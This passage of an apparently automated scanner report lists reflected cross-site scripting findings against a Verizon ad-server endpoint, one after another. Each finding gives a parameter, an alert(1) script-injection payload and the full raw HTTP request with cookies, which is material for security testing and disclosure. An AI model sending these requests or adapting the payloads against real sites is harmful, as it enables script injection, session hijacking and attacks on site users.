GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=ec203"><script>alert(1)</script>f54ed3ebb44&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:01 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dcbc"><script>alert(1)</script>588a49e61fd was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=7dcbc"><script>alert(1)</script>588a49e61fd&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3855"><script>alert(1)</script>424effc9656 was submitted in the usertype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=e3855"><script>alert(1)</script>424effc9656&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b7c"><script>alert(1)</script>5aa14f10290 was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=55b7c"><script>alert(1)</script>5aa14f10290&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the vec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b9e"><script>alert(1)</script>c95b9106569 was submitted in the vec parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=91b9e"><script>alert(1)</script>c95b9106569&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77b92"><script>alert(1)</script>a2d570f147e was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=77b92"><script>alert(1)</script>a2d570f147e&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 830fd"><script>alert(1)</script>3e4bb5b3888 was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=830fd"><script>alert(1)</script>3e4bb5b3888&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1392 Content-Type: text/html Cache-Control: private Content-Length: 1392
The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa0e"><script>alert(1)</script>31b9443c757 was submitted in the viss parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=bfa0e"><script>alert(1)</script>31b9443c757&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:32 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the vsbb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f54fd"><script>alert(1)</script>ecbc842c8ef was submitted in the vsbb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=f54fd"><script>alert(1)</script>ecbc842c8ef&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f786"><script>alert(1)</script>f1650cfbf93 was submitted in the webex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=3f786"><script>alert(1)</script>f1650cfbf93&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac813"><script>alert(1)</script>f2c20e38879 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=ac813"><script>alert(1)</script>f2c20e38879&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:55 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c1b"><script>alert(1)</script>6238df5bdc3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.netb6c1b"><script>alert(1)</script>6238df5bdc3/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:00:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 360 Content-Type: text/html Cache-Control: private Content-Length: 360
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 485c9"><script>alert(1)</script>4b86c156f98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage485c9"><script>alert(1)</script>4b86c156f98/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:00:55 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd200"a%3d"b"4f3fa442ed1 was submitted in the REST URL parameter 6. This input was echoed as dd200"a="b"4f3fa442ed1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/dd200"a%3d"b"4f3fa442ed1?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PJclQO20erias|O10escOz; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.verizononline.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1461 Content-Type: text/html Cache-Control: private Content-Length: 1461
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b232"><script>alert(1)</script>05b5cc07ece was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top6b232"><script>alert(1)</script>05b5cc07ece?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:01:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 351 Content-Type: text/html Cache-Control: private Content-Length: 351
The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497e1"><script>alert(1)</script>829630d20ba was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:55:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9e"><script>alert(1)</script>de0ed8fa512 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
